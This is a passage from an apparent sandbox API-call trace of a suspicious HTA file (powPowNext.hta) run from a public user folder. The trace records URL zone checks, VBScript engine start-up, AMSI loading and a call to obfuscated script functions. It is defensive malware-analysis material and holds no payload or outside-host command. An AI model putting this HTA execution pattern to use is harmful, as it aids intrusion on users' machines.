() returned 0xb48 [0133.902] GetCurrentThreadId () returned 0xb48 [0133.902] GetCurrentThreadId () returned 0xb48 [0133.903] GetCurrentThreadId () returned 0xb48 [0133.903] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x610430, hWnd=0x103ba, phIMC=0x19fb98 | out: phIMC=0x19fb98*=0x1e012b) returned 0x0 [0133.903] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x610430, hWnd=0x103ba, hIME=0x0, phPrev=0x19fb98 | out: phPrev=0x19fb98*=0x1e012b) returned 0x0 [0133.905] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.906] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0133.907] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0133.907] GetMessagePos () returned 0x11e01d6 [0133.909] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x19f71c | out: plResult=0x19f71c) returned 0x0 [0133.909] GetCurrentThreadId () returned 0xb48 [0133.909] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0133.910] GetMessagePos () returned 0x11e01d6 [0133.910] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x19f71c | out: plResult=0x19f71c) returned 0x0 [0133.910] GetCurrentThreadId () returned 0xb48 [0133.911] CActiveIMMAppEx_Trident:IActiveIMMApp:ReleaseContext (This=0x610430, hWnd=0x103ba, hIMC=0x1e012b) returned 0x0 [0133.911] GetFocus () returned 0x103ba [0133.911] GetFocus () returned 0x103ba [0133.911] StrCmpICW (pszStr1="file:///C:/Users/Public/powPowNext.hta", pszStr2="about:blank") returned 5 [0133.911] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f9f0 | out: ppu=0x19f9f0) returned 0x0 [0133.911] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0133.911] IUri:GetAbsoluteUri (in: This=0x609dbc, pbstrAbsoluteUri=0x19fa88 | out: pbstrAbsoluteUri=0x19fa88*="file:///C:/Users/Public/powPowNext.hta") returned 0x0 [0133.911] IUnknown:Release (This=0x609dbc) returned 0x7 [0133.912] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0133.958] GetProcAddress (hModule=0x703b0000, lpProcName=0x201) returned 0x7042b610 [0133.959] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f99c | out: lpflOldProtect=0x19f99c*=0x4) returned 1 [0134.200] GetCurrentThreadId () returned 0xb48 [0134.201] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0134.201] GetProcAddress (hModule=0x703b0000, lpProcName="ShouldShowIntranetWarningSecband") returned 0x70427f50 [0134.201] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f9bc | out: lpflOldProtect=0x19f9bc*=0x4) returned 1 [0134.202] ShouldShowIntranetWarningSecband () returned 0x0 [0134.203] GetIUriPriv () returned 0x0 [0134.203] IUnknown:Release (This=0x609dbc) returned 0x7 [0134.203] IUnknown:QueryInterface (in: This=0x609dbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f91c | out: ppvObject=0x19f91c*=0x609dbc) returned 0x0 [0134.204] IUnknown:Release (This=0x609dbc) returned 0x7 [0134.204] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0134.204] IUnknown:QueryInterface (in: This=0x609dbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f91c | out: ppvObject=0x19f91c*=0x609dbc) returned 0x0 [0134.204] IUnknown:Release (This=0x609dbc) returned 0x8 [0134.204] IUnknown:AddRef (This=0x609dbc) returned 0x9 [0134.204] IUnknown:Release (This=0x609dbc) returned 0x8 [0134.208] IUnknown:Release (This=0x609dbc) returned 0x7 [0134.208] QueryPerformanceCounter (in: lpPerformanceCount=0x19f9d8 | out: lpPerformanceCount=0x19f9d8*=3095302724207) returned 1 [0134.208] GetCurrentThreadId () returned 0xb48 [0134.209] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19f828 | out: lpPoint=0x19f828) returned 1 [0134.209] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.209] GetCurrentThreadId () returned 0xb48 [0134.209] GetCurrentThreadId () returned 0xb48 [0134.209] GetCurrentThreadId () returned 0xb48 [0134.210] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.210] StrChrW (lpStart="language", wMatch=0x3a) returned 0x0 [0134.210] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.210] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x67d210 [0134.210] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.211] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.211] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.211] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.211] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x800) returned 0x690770 [0134.211] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xd6) returned 0x68dd90 [0134.211] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.211] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.212] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f984 | out: ppu=0x19f984) returned 0x0 [0134.212] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0134.212] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0134.212] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.212] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f930, dwFlags=0x0 | out: pdwZone=0x19f930*=0xffffffff) returned 0x800c0011 [0134.212] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.212] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.212] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.212] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f934, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f914 | out: pPolicy=0x19f934*=0x0, pdwOutFlags=0x19f914*=0x0) returned 0x0 [0134.212] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f934, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f934*=0x0) returned 0x0 [0134.212] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.212] IUnknown:Release (This=0x5f0b00) returned 0x1 [0134.212] IUnknown:Release (This=0x609dbc) returned 0x7 [0134.213] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f8a0 | out: ppu=0x19f8a0) returned 0x0 [0134.213] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0134.213] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0134.213] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.213] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f84c, dwFlags=0x0 | out: pdwZone=0x19f84c*=0xffffffff) returned 0x800c0011 [0134.213] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.213] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.213] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.213] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f850, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f830 | out: pPolicy=0x19f850*=0x0, pdwOutFlags=0x19f830*=0x0) returned 0x0 [0134.213] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f850, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f850*=0x0) returned 0x0 [0134.213] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.213] IUnknown:Release (This=0x5f0b00) returned 0x1 [0134.213] IUnknown:Release (This=0x609dbc) returned 0x7 [0134.213] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f818 | out: ppu=0x19f818) returned 0x0 [0134.214] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0134.214] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0134.214] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.214] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f7c4, dwFlags=0x0 | out: pdwZone=0x19f7c4*=0xffffffff) returned 0x800c0011 [0134.214] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.214] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.214] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.214] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f7c8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f7a8 | out: pPolicy=0x19f7c8*=0x0, pdwOutFlags=0x19f7a8*=0x0) returned 0x0 [0134.214] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f7c8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f7c8*=0x0) returned 0x0 [0134.214] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.214] IUnknown:Release (This=0x5f0b00) returned 0x1 [0134.214] IUnknown:Release (This=0x609dbc) returned 0x7 [0134.214] StrCmpICW (pszStr1="javascript", pszStr2="javascript") returned 0 [0134.214] StrCmpICW (pszStr1="javascript", pszStr2="javascript") returned 0 [0134.214] GetCurrentThreadId () returned 0xb48 [0134.215] SysStringLen (param_1="file:///C:/Users/Public/powPowNext.hta") returned 0x26 [0134.215] SysStringLen (param_1="file:///C:/Users/Public/powPowNext.hta") returned 0x26 [0134.215] _wcsicmp (_String1="", _String2="") returned 0 [0134.215] malloc (_Size=0x139) returned 0xc4a598 [0134.215] malloc (_Size=0x22c) returned 0xc4a6e0 [0134.215] malloc (_Size=0x804) returned 0xc4a918 [0134.215] malloc (_Size=0x19c) returned 0xc4b128 [0134.215] free (_Block=0xc4b128) [0134.216] wcscpy_s (in: _Destination=0x735c220, _SizeInWords=0xb, _Source="tubeYouDow" | out: _Destination="tubeYouDow") returned 0x0 [0134.216] malloc (_Size=0xc) returned 0xc1a738 [0134.216] malloc (_Size=0xc) returned 0xc1a5e8 [0134.216] malloc (_Size=0x10) returned 0xc1a768 [0134.216] malloc (_Size=0x30) returned 0xc14be0 [0134.216] malloc (_Size=0xc) returned 0xc1a678 [0134.216] malloc (_Size=0xc) returned 0xc1a558 [0134.216] malloc (_Size=0x10) returned 0xc1a798 [0134.216] malloc (_Size=0x30) returned 0xc5a808 [0134.216] free (_Block=0xc4a918) [0134.216] free (_Block=0xc4a6e0) [0134.216] malloc (_Size=0x20) returned 0xc489d0 [0134.216] free (_Block=0xc4a598) [0134.217] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x569992eb, dwHighDateTime=0x1d7d80b)) [0134.217] GetTickCount () returned 0x1d6c5f7 [0134.217] GetCurrentThreadId () returned 0xb48 [0134.217] GetCurrentThreadId () returned 0xb48 [0134.217] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x5699a625, dwHighDateTime=0x1d7d80b)) [0134.217] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x5699a625, dwHighDateTime=0x1d7d80b)) [0134.217] GetTickCount () returned 0x1d6c5f7 [0134.217] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x5699a625, dwHighDateTime=0x1d7d80b)) [0134.217] free (_Block=0xc489d0) [0134.218] GetTickCount () returned 0x1d6c5f7 [0134.218] GetTickCount () returned 0x1d6c5f7 [0134.218] SetEvent (hEvent=0x388) returned 1 [0134.218] GetCurrentThreadId () returned 0xb48 [0134.218] GetCurrentThreadId () returned 0xb48 [0134.218] GetCurrentThreadId () returned 0xb48 [0134.218] GetCurrentThreadId () returned 0xb48 [0134.218] GetCurrentThreadId () returned 0xb48 [0134.218] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x5e0000) returned 1 [0134.218] GetCurrentThreadId () returned 0xb48 [0134.218] SetEvent (hEvent=0x29c) returned 1 [0134.228] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.228] StrChrW (lpStart="language", wMatch=0x3a) returned 0x0 [0134.228] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.228] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x67d170 [0134.229] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.229] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.229] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.229] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.229] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x800) returned 0x690880 [0134.229] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x80) returned 0x68c630 [0134.229] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f984 | out: ppu=0x19f984) returned 0x0 [0134.229] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0134.230] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0134.230] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.230] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f930, dwFlags=0x0 | out: pdwZone=0x19f930*=0xffffffff) returned 0x800c0011 [0134.230] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.230] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.230] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.230] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f934, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f914 | out: pPolicy=0x19f934*=0x0, pdwOutFlags=0x19f914*=0x0) returned 0x0 [0134.230] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f934, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f934*=0x0) returned 0x0 [0134.230] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.230] IUnknown:Release (This=0x5f0b00) returned 0x1 [0134.230] IUnknown:Release (This=0x609dbc) returned 0x7 [0134.230] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f8a0 | out: ppu=0x19f8a0) returned 0x0 [0134.230] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0134.231] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0134.231] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.231] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f84c, dwFlags=0x0 | out: pdwZone=0x19f84c*=0xffffffff) returned 0x800c0011 [0134.231] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.231] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.231] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.231] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f850, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f830 | out: pPolicy=0x19f850*=0x0, pdwOutFlags=0x19f830*=0x0) returned 0x0 [0134.231] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f850, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f850*=0x0) returned 0x0 [0134.231] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.231] IUnknown:Release (This=0x5f0b00) returned 0x1 [0134.231] IUnknown:Release (This=0x609dbc) returned 0x7 [0134.231] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f818 | out: ppu=0x19f818) returned 0x0 [0134.231] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0134.231] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0134.231] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.231] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f7c4, dwFlags=0x0 | out: pdwZone=0x19f7c4*=0xffffffff) returned 0x800c0011 [0134.232] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.232] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.232] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.232] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f7c8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f7a8 | out: pPolicy=0x19f7c8*=0x0, pdwOutFlags=0x19f7a8*=0x0) returned 0x0 [0134.232] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f7c8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f7c8*=0x0) returned 0x0 [0134.232] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.232] IUnknown:Release (This=0x5f0b00) returned 0x1 [0134.232] IUnknown:Release (This=0x609dbc) returned 0x7 [0134.232] StrCmpICW (pszStr1="vbscript", pszStr2="javascript") returned 12 [0134.232] StrCmpICW (pszStr1="vbscript", pszStr2="javascript") returned 12 [0134.232] StrCmpICW (pszStr1="vbscript", pszStr2="ecmascript") returned 17 [0134.232] StrCmpICW (pszStr1="vbscript", pszStr2="ecmascript") returned 17 [0134.232] StrCmpICW (pszStr1="vbscript", pszStr2="x-javascript") returned -2 [0134.232] StrCmpICW (pszStr1="vbscript", pszStr2="jscript") returned 12 [0134.232] StrCmpICW (pszStr1="vbscript", pszStr2="vbscript") returned 0 [0134.233] CoCreateInstance (in: rclsid=0x19f7dc*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d7169f4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x19f774 | out: ppv=0x19f774*=0xc4a598) returned 0x0 [0134.363] malloc (_Size=0x80) returned 0xbfcae8 [0134.365] __dllonexit () returned 0x65c4c960 [0134.366] __dllonexit () returned 0x65c4c970 [0134.366] __dllonexit () returned 0x65c4c980 [0134.376] GetUserDefaultLCID () returned 0x409 [0134.376] GetVersion () returned 0x295a000a [0134.376] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x74530000 [0134.377] GetProcAddress (hModule=0x74530000, lpProcName="QueryProtectedPolicy") returned 0x76cf2bc0 [0134.377] VirtualProtect (in: lpAddress=0x65c7e328, dwSize=0x4, flNewProtect=0x4, lpflOldProtect=0x19dde8 | out: lpflOldProtect=0x19dde8*=0x2) returned 1 [0134.378] VirtualProtect (in: lpAddress=0x65c7e328, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0x19dde8 | out: lpflOldProtect=0x19dde8*=0x4) returned 1 [0134.380] malloc (_Size=0x38) returned 0xc5af88 [0134.381] malloc (_Size=0x214) returned 0xc4a598 [0134.381] GetUserDefaultLCID () returned 0x409 [0134.381] GetACP () returned 0x4e4 [0134.381] LoadLibraryExW (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x800) returned 0x6b040000 [0134.414] GetProcAddress (hModule=0x6b040000, lpProcName="AmsiInitialize") returned 0x6b043d40 [0134.414] GetProcAddress (hModule=0x6b040000, lpProcName="AmsiScanString") returned 0x6b0440e0 [0134.414] AmsiInitialize () returned 0x0 [0134.472] free (_Block=0xc5af88) [0134.473] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0134.473] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0134.473] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.473] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f6a0, dwFlags=0x0 | out: pdwZone=0x19f6a0*=0xffffffff) returned 0x800c0011 [0134.473] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.473] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.473] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0134.473] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1401, pPolicy=0x19f6a4, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f684 | out: pPolicy=0x19f6a4*=0x0, pdwOutFlags=0x19f684*=0x0) returned 0x0 [0134.473] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1401, pPolicy=0x19f6a4, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f6a4*=0x0) returned 0x0 [0134.473] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0134.473] IUnknown:Release (This=0x5f0b00) returned 0x1 [0134.474] IUnknown:Release (This=0x609dbc) returned 0x7 [0134.501] GetCurrentThreadId () returned 0xb48 [0134.501] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.501] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.502] GetCurrentThreadId () returned 0xb48 [0134.502] malloc (_Size=0xb4) returned 0xc4a998 [0134.502] GetCurrentThreadId () returned 0xb48 [0134.502] malloc (_Size=0x14) returned 0xc5af88 [0134.502] malloc (_Size=0x1c) returned 0xc489d0 [0134.503] malloc (_Size=0x78) returned 0xc4aa58 [0134.503] malloc (_Size=0x1c) returned 0xc486d8 [0134.503] GetCurrentThreadId () returned 0xb48 [0134.503] malloc (_Size=0x44) returned 0xc5ad18 [0134.503] GetCurrentThreadId () returned 0xb48 [0134.503] GetCurrentThreadId () returned 0xb48 [0134.503] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0134.503] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x19f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0134.503] IsValidCodePage (CodePage=0x4e4) returned 1 [0134.504] GetCurrentThreadId () returned 0xb48 [0134.504] GetCurrentThreadId () returned 0xb48 [0134.504] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x76c20000 [0134.505] GetProcAddress (hModule=0x76c20000, lpProcName="ResolveDelayLoadedAPI") returned 0x76ce2570 [0134.505] GetProcAddress (hModule=0x76c20000, lpProcName="ResolveDelayLoadsFromDll") returned 0x76d56250 [0134.506] ResolveDelayLoadedAPI () returned 0x76e20060 [0134.506] CoCreateInstance (in: rclsid=0x65c11fcc*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x65c11f8c*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0xc4a774 | out: ppv=0xc4a774*=0x68f968) returned 0x0 [0134.507] IUnknown:AddRef (This=0x68f968) returned 0x2 [0134.507] GetCurrentProcessId () returned 0xe14 [0134.507] GetCurrentThreadId () returned 0xb48 [0134.507] GetTickCount () returned 0x1d6c720 [0134.507] ISystemDebugEventFire:BeginSession (This=0x68f968, guidSourceID=0x65c11fbc, strSessionName="VBScript:00003604:00002888:30852896") returned 0x0 [0134.516] GetCurrentThreadId () returned 0xb48 [0134.516] GetCurrentThreadId () returned 0xb48 [0134.516] malloc (_Size=0x28) returned 0xc5afa8 [0134.516] GetCurrentThreadId () returned 0xb48 [0134.516] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0134.516] malloc (_Size=0x88) returned 0xc4aad8 [0134.516] malloc (_Size=0x40) returned 0xc46920 [0134.516] malloc (_Size=0x104) returned 0xc4ab68 [0134.516] malloc (_Size=0x8) returned 0xc1a460 [0134.517] GetCurrentThreadId () returned 0xb48 [0134.517] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0134.517] GetCurrentThreadId () returned 0xb48 [0134.517] _wcsicmp (_String1="window", _String2="window") returned 0 [0134.517] realloc (_Block=0x0, _Size=0xc8) returned 0xc4ac78 [0134.517] _wcsicmp (_String1="", _String2="") returned 0 [0134.518] SysStringLen (param_1="Call tubeYouDow(tubeNextDoor) : Call tubeYouDow(likeGirlTube)") returned 0x3d [0134.518] malloc (_Size=0x24) returned 0xc4ad48 [0134.518] malloc (_Size=0x804) returned 0xc4ad78 [0134.518] malloc (_Size=0x14c) returned 0xc4b588 [0134.518] malloc 